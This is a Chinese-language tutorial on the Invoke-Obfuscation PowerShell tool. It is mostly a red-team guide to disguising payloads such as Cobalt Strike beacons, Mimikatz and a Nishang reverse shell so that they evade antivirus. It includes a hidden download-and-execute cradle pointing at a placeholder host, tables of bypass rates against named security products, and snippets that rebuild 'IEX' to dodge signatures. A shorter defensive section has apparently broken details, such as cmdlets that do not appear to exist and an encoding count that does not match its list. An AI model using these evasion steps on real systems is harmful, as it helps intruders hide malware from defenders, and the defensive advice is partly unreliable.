PowerShell混淆神器Invoke-Obfuscation详解：从原理到实战 - 实践

PowerShell混淆神器Invoke-Obfuscation详解：从原理到实战

1 Invoke-Obfuscation简介

Invoke-Obfuscation是一款专为PowerShell设计的代码混淆工具，由安全研究员Daniel Bohannon开发并开源在GitHub上。这款工具主要目的是帮助蓝队研究人员测试和研究PowerShell v2.0-v5.0语法上可能存在的命令混淆问题，以便提升研究人员和反病毒产品的检测能力。在许多实际案例中，包括APT32（海莲花）等著名攻击组织都在使用此类工具进行混淆操作，使得它对网络安全领域具有重要意义。

PowerShell作为一种强大的脚本语言，因其深度集成于Windows系统且功能丰富，成为系统管理员和攻击者共同关注的工具。攻击者越来越多地利用PowerShell进行恶意操作，因为它可以提供高度隐蔽性和执行效率。然而，传统的安全防御工具往往依赖于签名检测和静态分析方法来识别恶意脚本，Invoke-Obfuscation通过多种混淆技术使得PowerShell脚本的检测和分析变得更加困难。

2 安装与配置

2.1 环境要求与安装步骤

Invoke-Obfuscation需要PowerShell v2.0及以上版本的支持，可以在Windows 7、Windows 10和Windows Server等多个版本的操作系统中运行。安装过程简单直接，主要通过Git克隆代码库到本地：

git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

完成后，进入Invoke-Obfuscation目录，在PowerShell环境中导入模块并启动工具：

# 导入模块
Import-Module .\Invoke-Obfuscation.psd1
# 启动工具
Invoke-Obfuscation

如果运行时报错，可能需要先修改PowerShell的执行策略，允许脚本运行：

Set-ExecutionPolicy Unrestricted

2.2 基本配置与模块导入

首次使用Invoke-Obfuscation时，需要确保模块正确导入。如果遇到模块导入失败的情况，可以尝试使用绝对路径指定模块位置：

Import-Module C:\Path\To\Invoke-Obfuscation\Invoke-Obfuscation.psd1

成功启动后，工具会进入一个交互式命令行界面，用户可以通过输入各种命令来选择混淆技术和参数。

3 核心功能与使用方法

Invoke-Obfuscation提供六种主要的混淆技术，每种技术针对PowerShell脚本的不同层面进行混淆处理，下面我们将详细分析这些功能及其使用方法。

3.1 六种混淆技术详解

1. TOKEN（令牌混淆）：将脚本转换为一个或多个PowerShell解析器令牌的序列，可以针对命令、参数、变量、类型等特定令牌类型进行混淆。支持多种子选项：

   • TOKEN\COMMAND：混淆命令令牌
   • TOKEN\ARGUMENT：混淆参数令牌
   • TOKEN\VARIABLE：混淆变量令牌
   • TOKEN\ALL：应用所有令牌混淆技术（随机顺序）

2. AST（抽象语法树混淆）：将脚本转换为抽象语法树，然后对特定类型的AST节点进行混淆处理。这种方法适用于PowerShell v3.0+，支持的节点类型包括：

   • AST\NamedAttributeArgumentAst：混淆命名属性参数节点
   • AST\ScriptBlockAst：混淆脚本块节点
   • AST\BinaryExpressionAst：混淆二元表达式节点
   • AST\ALL：选择所有AST节点类型进行混淆

3. STRING（字符串混淆）：专门混淆脚本中的字符串，使得脚本的意图变得模糊不清。它通过多种编码和转换方法处理字符串内容，包括：

   • 反转字符串
   • 使用转义序列
   • 转换为十六进制或八进制表示
   • 使用字符串连接技术

4. ENCODING（编码混淆）：将脚本转换为各种编码格式，使得原始代码不易被识别。提供8种编码方式：

   • ASCII编码
   • HEX（16进制）编码
   • Octal（8进制）编码
   • Binary（2进制）编码
   • SecureString加密
   • AES算法加密（最常用）

5. COMPRESS（压缩混淆）：将脚本压缩为单行程序并减少体积，使得脚本的传输和存储更加方便。这种方法不仅减小了脚本大小，还增加了可读性难度。

6. LAUNCHER（启动器混淆）：生成一个启动器，该启动器可以在目标系统上执行混淆后的脚本，并可以指定混淆命令参数和启动技术。支持多种执行方式，包括：

   • 通过PS（PowerShell）启动
   • 通过CMD（命令提示符）启动
   • 通过WMIC（Windows管理工具）启动
   • 通过VAR（变量表达式）启动

表：Invoke-Obfuscation的主要混淆技术对比

技术类型	针对层面	PowerShell版本要求	检测难度
TOKEN	语法令牌	v2.0+	中等
AST	语法结构	v3.0+	高
STRING	字符串内容	v2.0+	中等
ENCODING	整体编码	v2.0+	高
COMPRESS	脚本体积	v2.0+	中等
LAUNCHER	执行方式	v2.0+	高

3.2 操作示例与演示

下面我们通过一个实际示例演示Invoke-Obfuscation的使用流程。假设我们有一个Cobalt Strike生成的PowerShell负载文件payload.ps1，我们需要对其进行混淆以绕过安全检测：

1. 设置脚本路径：在Invoke-Obfuscation命令行中，首先指定要混淆的脚本路径

   set scriptpath C:\Users\hacker\Desktop\payload.ps1

2. 选择混淆技术：我们选择编码加密中的AES算法加密

   encoding
   5

3. 添加额外混淆：返回上级菜单，添加字符串混淆增加复杂度

   back
   string
   2

4. 查看混淆选项：检查应用的混淆方法和结果

   show options

5. 输出混淆脚本：将混淆后的脚本保存到文件

   out test.ps1

6. 执行混淆脚本：使用PowerShell执行混淆后的脚本，需绕过执行策略限制

   PowerShell.exe -ExecutionPolicy Bypass -File .\test.ps1

对于简单的单行命令，可以直接使用ScriptBlock进行混淆而不需要外部文件：

set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\"http://x.x.x.x:80/b\"))"'

3.3 高级用法与技巧

• 多次混淆：Invoke-Obfuscation支持对同一脚本应用多种混淆技术，大幅提高检测难度。可以先使用ENCODING进行加密，再应用TOKEN混淆，最后使用COMPRESS进行压缩。

• 批量处理：可以通过编写PowerShell脚本批量处理多个文件，提高效率：

  $files = Get-ChildItem -Path C:\scripts\*.ps1
  foreach ($file in $files) {
  Invoke-Obfuscation -ScriptPath $file.FullName -Command 'Encoding\1' -Quiet -OutFile ("C:\obfuscated\" + $file.Name)
  }

• 自定义混淆：通过编辑Invoke-Obfuscation的源代码，可以创建自定义的混淆算法和方法，进一步避开安全产品的检测规则。

表：不同编码方式的比较与适用场景

编码类型	特点	大小增加	兼容性	检测难度
ASCII	简单字符替换	低	高	低
HEX	十六进制表示	中等	高	中等
Octal	八进制表示	中等	高	中等
Binary	二进制表示	高	中等	高
SecureString	安全字符串加密	低	中等	高
AES	强加密算法	低	高	很高

4 免杀效果与实测分析

4.1 针对主流杀软的测试结果

通过多个来源的测试数据，我们对Invoke-Obfuscation的免杀效果进行了全面评估。以下是在2023-2024年期间的主要测试结果：

表：Invoke-Obfuscation混淆后的静态查杀率测试结果

混淆方法	火绒	360	Windows Defender	VT检测率
原始脚本	检测	检测	检测	58/59
TOKEN-ALL	不检测	检测	检测	45/59
ENCODING-1 (ASCII)	不检测	不检测	检测	5/58
ENCODING-4 (Octal)	不检测	不检测	检测	7/59
ENCODING-5 (AES)	不检测	不检测	检测	3/59
多重复合混淆	不检测	不检测	检测	1/59

表：Invoke-Obfuscation混淆后的动态查杀率测试结果

混淆方法	火绒	360	Windows Defender	成功上线
原始脚本	检测	检测	检测	否
ENCODING-1 (ASCII)	不检测	不检测	检测	是
ENCODING-4 (Octal)	不检测	不检测	检测	是(Win7)
ENCODING-5 (AES)	不检测	不检测	检测	是
多重复合混淆	不检测	不检测	检测	是

从测试结果可以看出，Invoke-Obfuscation对火绒和360安全卫士有较好的绕过效果，但对Windows Defender的效果较差，尤其是动态检测方面。需要注意的是，Windows Defender经常更新其检测算法，实际结果可能随时间变化。

4.2 绕过技巧与特征修改

即使使用混淆工具，某些特征仍可能被安全软件检测到。例如，火绒杀毒软件曾经通过检测$shellid变量来识别混淆的PowerShell脚本。通过修改这一特征，可以进一步提高绕过成功率：

1. 变量名修改：将$shellid改为其他变量名，如$shell_id或$shid

2. 函数封装：通过函数嵌套返回值间接获取变量值

   function Get-ShellID {
   function InnerFunc {
   return 'i'+'e'
   }
   return InnerFunc
   }
   & (Get-ShellID+'X')((payload...))

3. 条件判断：使用switch-case或if-else结构动态生成变量值

   function Get-Char([int]$idx){
   switch($idx){
   1 {
   return 'i'
   }
   2 {
   return 'e'
   }
   Default {
   return ''
   }
   }
   }
   $var = (Get-Char 1) + (Get-Char 2)
   & ($var+'X')((payload...))

4. 编码转换：使用XOR或其他编码技术隐藏特征值

   $x = [char]([byte]0x69) # 'i'
   $y = [char]([byte]0x65) # 'e'
   & ($x+$y+'X')((payload...))

4.3 实战注意事项

在实际渗透测试中，成功执行混淆后的PowerShell脚本需要注意以下几点：

• 执行策略绕过：PowerShell默认限制脚本执行，需要使用参数绕过限制

  PowerShell.exe -ExecutionPolicy Bypass -File .\obfuscated.ps1

• 窗口隐藏：使用参数隐藏PowerShell窗口，避免用户察觉

  PowerShell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File .\obfuscated.ps1

• 日志规避：混淆后的PowerShell命令可以增加系统日志的分析难度，但无法完全避免日志记录。需要结合其他技术清除日志痕迹。

• 分段执行：对于较长的脚本，可以分段混淆和执行，降低单次执行的检测风险。

5 实战应用与防御措施

5.1 红队操作指南

对于红队成员和渗透测试人员，Invoke-Obfuscation可以与其他PowerShell框架结合使用，形成强大的攻击链：

1. 与Nishang结合：Nishang是一个PowerShell渗透测试框架，包含多种攻击载荷

   # 下载Nishang脚本
   Invoke-WebRequest -Uri "https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" -OutFile "Invoke-PowerShellTcp.ps1"
   # 混淆脚本
   Invoke-Obfuscation -ScriptPath "Invoke-PowerShellTcp.ps1" -Command 'Encoding\5,Token\ALL' -Quiet -OutFile "Obfuscated-Tcp.ps1"

2. 与PowerSploit结合：PowerSploit是后渗透测试框架，也可以使用Invoke-Obfuscation进行混淆

   # 混淆Invoke-Mimikatz脚本
   Invoke-Obfuscation -ScriptPath "Invoke-Mimikatz.ps1" -Command 'Encoding\1,String\2' -Quiet -OutFile "Obfuscated-Mimikatz.ps1"

3. 与Cobalt Strike结合：将Cobalt Strike生成的PowerShell载荷进行混淆，绕过终端防护

   # 设置脚本路径并选择混淆方式
   set scriptpath C:\Payloads\beacon.ps1
   encoding
   5
   out obfuscated-beacon.ps1

5.2 蓝队防御策略

对于蓝队成员和安全管理员，需要采取多层次防御策略来检测和阻止混淆的PowerShell攻击：

1. 启用增强日志记录：配置PowerShell模块日志记录和脚本块日志记录，收集详细执行信息

   # 启用PowerShell模块日志记录
   Set-ModuleLogging -ModuleName * -Enable
   # 启用脚本块日志记录
   Set-ScriptBlockLogging -Enable

2. 应用约束语言模式：限制PowerShell的功能，只允许基本操作

   # 设置语言模式为约束语言模式
   $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

3. 部署专门检测工具：使用专门检测PowerShell攻击的工具，如：

   • AMSi（反恶意软件扫描接口）：实时检测恶意脚本内容
   • Sysmon：监控PowerShell执行过程和参数
   • PowerShell审计策略：启用详细审计功能

4. 网络层过滤：监控和过滤异常网络连接，尤其是PowerShell脚本下载外部资源的行为

5. 定期更新检测规则：保持安全产品更新，加入针对混淆PowerShell的检测规则

5.3 检测与取证方法

当怀疑系统遭受混淆PowerShell攻击时，可以进行以下检测和取证操作：

1. 日志分析：检查PowerShell事件日志（位于%SystemRoot%\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx），寻找异常执行记录

2. 进程监控：使用进程监控工具（如Procmon）观察PowerShell进程的创建和网络活动

3. 反混淆分析：对可疑脚本进行反混淆处理，分析其真实功能：

   • 手动解码编码内容
   • 使用Invoke-Deobfuscation等工具尝试反混淆
   • 在隔离环境中执行并监控行为

4. 内存取证：对PowerShell进程进行内存转储，分析内存中的明文代码和数据的残留

6 总结与展望

Invoke-Obfuscation作为一款专业的PowerShell混淆工具，既体现了PowerShell在安全领域的双刃剑特性，也推动了防御技术的不断发展。对于红队成员，它提供了绕过安全检测的有效手段；对于蓝队成员，它帮助识别防御体系的不足，推动更强大的检测和防护技术发展。

未来，随着人工智能和行为分析技术在安全领域的深入应用，单纯基于混淆的免杀技术可能会逐渐失效。动态分析、沙箱检测和机器学习算法将能够更好地识别恶意行为，而不依赖于代码特征。另一方面，PowerShell仍然是Windows生态系统中不可或缺的一部分，攻击者和防御者之间的博弈将持续升级。

对于安全从业人员，无论处于哪一阵营，都需要深入理解PowerShell混淆技术的工作原理和检测方法，只有知己知彼，才能在日益复杂的网络安全战场上保持优势。

重要声明：本文介绍的Invoke-Obfuscation工具和技术仅限用于合法授权的安全测试和教育研究中。未经授权对系统进行渗透测试可能违反法律法规，请务必遵守当地法律和道德准则。